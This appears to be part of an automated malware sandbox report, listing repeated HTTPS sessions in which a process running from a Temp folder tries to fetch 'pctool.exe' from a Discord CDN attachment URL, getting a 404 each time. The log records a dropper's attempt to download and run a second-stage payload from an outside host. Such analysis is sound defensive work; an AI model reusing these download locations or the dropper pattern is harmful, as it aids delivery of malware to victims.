                                      Set-Cookie: _cfuvid=On.XWPCCSsi80_kI0t9mbY238fDy6F7wO85JdzOGESg-1724230756797-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696d15e9af0f77-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:16 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.460041162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:22 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:22 UTC1049INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:22 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=r5q_MK8YpFMYPNbcc1.kX8RIiVI1rtNeb4bFxocPKYo-1724230762-1.0.1.1-8Hdd2zz1IHHPvVuBEh.DDYTo4N4tsRJAHAj6yNUcWr3mMDFkfb_DnpFF07XPLwVj.mnZDzEmyBIbnJhRohWrOg; path=/; expires=Wed, 21-Aug-24 09:29:22 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnKxc6qMscffapdK5t%2Fnee0CXxMVpH%2Fr4F1tc5%2FgWark2gCs95NXGVVmPJtBYCeep1s03ek9li1qVIK1i59aBruDdQB%2BrrdvSoSfpuogiXXM4Tf29fTllI17bv1qv5m6fOioxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=bUG0XFfKSAkJAqxm47.1o7wP2qf9SbJqpD8R6ET13K4-1724230762433-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696d392f7c0fa8-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:22 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.460046162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:27 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:28 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:28 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=lUWhQ041.lMfsVwD_ObAqgnetF1e6faH6a42qxBSUC4-1724230768-1.0.1.1-ui6c2j7YChLvaWYB2_1ykF_FQKVrPBA6dx2rva5NyVMvwS_y_VdQA6lcVX8ogJ.XfNCZ5tNxSgFczuGbGr08Bg; path=/; expires=Wed, 21-Aug-24 09:29:28 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aIvyOxxUQQzeoC%2F2iCgIfEesd%2FfZqebLYLgR2WG8HlQvR%2Fivgch5wDcLzbo%2FUWcckSc5tzaHPoePVAoKA3Omvr4bZly%2F8pWnytd8D8iyHM2fLyHNcgLbRyugMzmdlZIF8mzyRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=M3quJcqeq9eAhjRyx1k7x1SjPA_U8AwtU4Uc0fUXMtI-1724230768081-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696d5c6de532e2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:28 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.460050162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:33 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:33 UTC1055INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:33 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=V_YOpyhs7fWfw_vz2CWkj5fKz7r_7WhhtcWixudnSSw-1724230773-1.0.1.1-OracUGoDq0mWHrpIN9tj7OMnHBQP1y8oRRPWE0_EsmDFRMaS.aZxwGoh_e9g8b3twi3zFoht7tK6O0btn9nfOQ; path=/; expires=Wed, 21-Aug-24 09:29:33 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm1ZYh%2BUy03nSO56alZ%2F1nKYT%2B5E%2F6jR4uD2Gn9gArx%2FTdsIP6Cg54mNmciCVCBIg%2FXc6pfVAGTSBP0t6xlRAQF%2F7Emlu8pyob5WrGZr2QcFnhAxwUlXnX8MhsvWHL4ewqqOQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=1EsbuVwMRkLUBKh2Lp9i_6pU0rAVxa0kCETiLsoSo6s-1724230773697-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696d7f7c5f159f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:33 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.460054162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:39 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:39 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:39 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=VsfeA5YgZU0Alz8.JLAyCajoPQkSuqlniiEt_j69nYo-1724230779-1.0.1.1-RkPFY9dJiAKhFlkDvlNOnJMNXWoB8ebDCCx7XmVieINAE55ouduS.fj13.vPotom183wMaAFvEVAhb80nYmQ.A; path=/; expires=Wed, 21-Aug-24 09:29:39 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2FCiPLmv5iDCAvLc9iwjzkbIAUWHDyub%2BUeGp4KnaSHBtPlkBpKV072T9mGPBYjPCMLCwwcXdoqmDC%2BGnUl6PvMOo6%2FC0zyoFiVjlnLiqMKu2rjd6Ps9WKnctqaR%2BT0h4KzVGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=zL.9I.dDqc9HmiC5tbwb8GcpOGQER.hBqM6ceH0TugY-1724230779332-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696da2b84143c8-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:39 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.460058162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:44 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:45 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:44 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=FMKPU8XYSsF9F0E8B8.nIZRWilKXobToQ0q0_kbPgbs-1724230784-1.0.1.1-0ZxROcpUAUcpmOQ6zkW17EVvZwI26kQ7.Gpsvld8046KgUHFY3tRRKGyT3qzGrrsE7DpPNhZ8uRxMF2h5xIItA; path=/; expires=Wed, 21-Aug-24 09:29:44 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFSphp%2BEx8xB2aVO%2Bhu4lJkJohZmqW7rn1pJpqUKKcTwiCA%2BRZEpHby87N69J%2FzoBGa4P1OfAa5YDuYyEUyC%2FpNqzCo7PpTYWAk0JYCPHHWKYC0MaKVYs7yLKH41vpAKxGWssA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=u7uVKjud3VTit6vZ4rnlUu29y6DA_m68kF3DnWkReFI-1724230784999-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696dc63cbe1835-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:45 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.460062162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:50 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:50 UTC1045INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:50 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=77JwWXGdx7zwtHQr8u0GrFbJscrwxdofdu5xXN3Bj5Q-1724230790-1.0.1.1-dQ.zCkxriWAduqA4m26I02cvWE50qYc5VyiawPsOifJYMtEaZW5wGSrecfTLdiMC5dFpHgoFFxZZOZyDlRpqrw; path=/; expires=Wed, 21-Aug-24 09:29:50 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmOK%2FFnaoNgi1y3qLWSDcofay3t6NskD9PG8QN5rxCWdy3BLsIGFgXyRWNHxWmFHVQMBeRF2HYTsdXy4WD499L8AvkPIL3VkTb%2B4HoW1tRV8KGN2Qg00n50RHUeKJozbDmkM0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=_u.u67H888eUwBaugIH0aV9p8M77z21FJ3a_xZn4fEA-1724230790644-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696de96ef9c434-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:50 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.460067162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 08:59:56 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:59:56 UTC1047INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:59:56 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=LxyzNDXBY2Kk9o2NsZ3JhND.lw_ckFVrWHhyU4xix3g-1724230796-1.0.1.1-00TUFqbCUQuqKsDCO6Rj1dsXNLy0oagAF0tR.csjiOVDduaOm52Ewl3UJq7J_6g5_5_nQ99QZw9mC_8w_lAoYQ; path=/; expires=Wed, 21-Aug-24 09:29:56 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKqWpgAQN8iVnLheOYqL8GcBef0W46owytrM81Jnne%2BcwwBPpTkf9vB8GDnxg9w%2BsvBof03rQ82YQIFFfJkPPc70%2FFWAVU0a0GXgm5hYQMOSalZKTXvk6NqjyuDlzLRcOUeAZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=TWzxHPZwrNypd0f72ewZQEbdNf358qbiQowmXtkIKTc-1724230796254-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e0c8fc50f60-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:59:56 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.460071162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:01 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:01 UTC1059INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:01 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=UPm4koZUTri1ZBlqVF8jXvLi3g.jW9N_cjK8O4BHZrg-1724230801-1.0.1.1-bLwlr_wS1EaRgraLoj2du7UVMmsmyFhQcDBwMlinMg2nG35wzVgDpSkDhXM5AdD1FE.j03I6OcOOYGsKHrkqGQ; path=/; expires=Wed, 21-Aug-24 09:30:01 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2FpogMS1K8ZhkmzVoLG%2B3jYHXMI5ZYSydnHNl%2BejyDsGBIjQFwoB5BvnDDOhe7eCmqSc%2B1aAfQ%2Bl%2FC8wiNvEazgKvyJCQkO%2Bk9%2FVEjL6b%2FtbuPHqP6aabqCsJci1JL7j2Lj3Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Y2mY8.hNfMdokEOoDj0iuWUQlwnHpgixwfmDZcVKAIU-1724230801895-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e2fc9605e79-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:01 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.460075162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:07 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:07 UTC1055INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:07 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=Vlp40VoFFmoxXiL8KGE3_ZeH2T4US26PN79VEjWhP_I-1724230807-1.0.1.1-u7phVtUQvOv_bTuAMKCUAObQJMbhT3DtVW6WpzTimYvxhWWThNpHG0R9L1ZU7sK4bBGs5OahIXyoHzLaLFNjVQ; path=/; expires=Wed, 21-Aug-24 09:30:07 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMUgkTX5ul2TrLML%2B%2F%2B43X32525q9ZQArTtcZLbGRLr08euEy7q7zNdOmmCZk0gDG2o%2Fixqz2N0IeuKG%2FR2jWPWEvUNYahq8qSSW6RMPvab%2FvMnLe06rr9Mnasd1%2B1dpk0ppTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=3ltFfUXMdUm_VTaq5ylUa3l99E4g3qYSbYl0_zZcY5o-1724230807530-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e52fe3543fe-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:07 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.460080162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:13 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 09:00:13 UTC1049INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:13 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=1oDfCiJh2IGy5_ByXZSTqDKoCPo2aGVmZl_YaSDhUg8-1724230813-1.0.1.1-5mcLTNdpOUS.h28t.cuX4NrPugUmTgKNRngQ6nDu0MF2ikAa61SFtB7._OuYNWI1557.m5mOXrhIOs2m40abAA; path=/; expires=Wed, 21-Aug-24 09:30:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dP3KrWc3rNULTb%2B4TJ3upXZEIAhLgKpT2fX7DBYB6CiGvqkS%2Flsu0JGHjqSOxq8msQ%2BA9nRmrz6AeuApMf7LElhrJGS%2Fw1HnN0LxypeR8kGApApZmRAbtgmzeerkQveSt8P9qw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Ow_u9KO6VJrFgWdqZtkgRYAmxPrDHk3C5.qxnTAqu80-1724230813156-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e7618ce1821-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:13 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.460083162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:18 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:18 UTC1043INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:18 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=vquBfoat0ti8JBRtc2UJDfRrfrFJ_RQq_QmFVBiPXdQ-1724230818-1.0.1.1-ihHMcvoSY3gkQqiaktsrUAwPtSBIqyOved6qF9HWcDEHTOHdIJcvjAMw4s0DOG83iBKeMWyBjKgihrhxGMVvMw; path=/; expires=Wed, 21-Aug-24 09:30:18 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pnpi%2FLX0fbM4s2AyhAT0U2TW9JW4bSLt3UMJDhopWjgS0dj9EHHelwEyzF9yW7EZEXYKlb9zzrvAYxsDmd0KJOnKOVcxqWwJaCQzdgRqfDdjvfECxVfoCvBd8kwwBzcQSSyygw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=JPBHsANHK21PFW6Acd66B23lW83gpH3t5LvwdRLMOAY-1724230818814-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e998dcd1906-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:18 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.2.460087162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:24 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:24 UTC1051INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:24 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=DUlwbPlsV._tPzPtxXTXxjl3uUFCpqQ6ZMase4QvG30-1724230824-1.0.1.1-dwMee_HmryBstTOjBO6d1iHgWGDZbI3_ClcLoKg5p_wyTAgyktA5Qq__EShRqlJxwjgVoTdlcfozpF6LxbKmtw; path=/; expires=Wed, 21-Aug-24 09:30:24 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQRLgUm1QoK%2F1HvfdaLzTTXgOWaDky9AaK5My2J5K1UgnddD5tVfEyiKsrZ3eX77HQSN%2FOxAA8IgurNG%2FdFybvqvPJyIOmaVDGF1P0yI67uoFA6%2BmIBx6RSg54tN%2FbEcHLZD2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=P5J4py93aGuJf2iVPIBUq7jLgDyGN._b3ye68lBsHwo-1724230824409-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696ebc7bde5e74-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:24 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.2.460092162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:29 UTC128OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 09:00:30 UTC1053INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:30 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=xYgYULbsG3tyKJByRJxxNsnnGNm9EkxlSyc5YLuBQ68-1724230830-1.0.1.1-Sx1NQNE0xZ2szSNFOnRXb1ghDtAD6MYRjCdBPg.qJ0G6Rl3mtYlrhtWbgyI.nxx2Ou6FyhY4szFAqi_PShlmbA; path=/; expires=Wed, 21-Aug-24 09:30:30 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3NSi%2BuZFkocpech5P2sU7dTOg6obM7a3CZ%2Bk2FHEabn9ACGEyEmfA%2BOublDfwwsGyiaFZbwqJUZwJyXj9MOTwg%2FN0x3RlBaUuHdDfgrh%2Bf80CukkoUFmkSeSkPCO2arGr%2FVcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=DwYx9gQl5y0SE_Pp6M30Mg7isTI85M56GwwPVmX0kjw-1724230830049-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696edfb904426d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:30 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.2.460096162.159.130.2334437972C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-21 09:00:35 UTC104OUTGET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:35 UTC1041INHTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:35 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
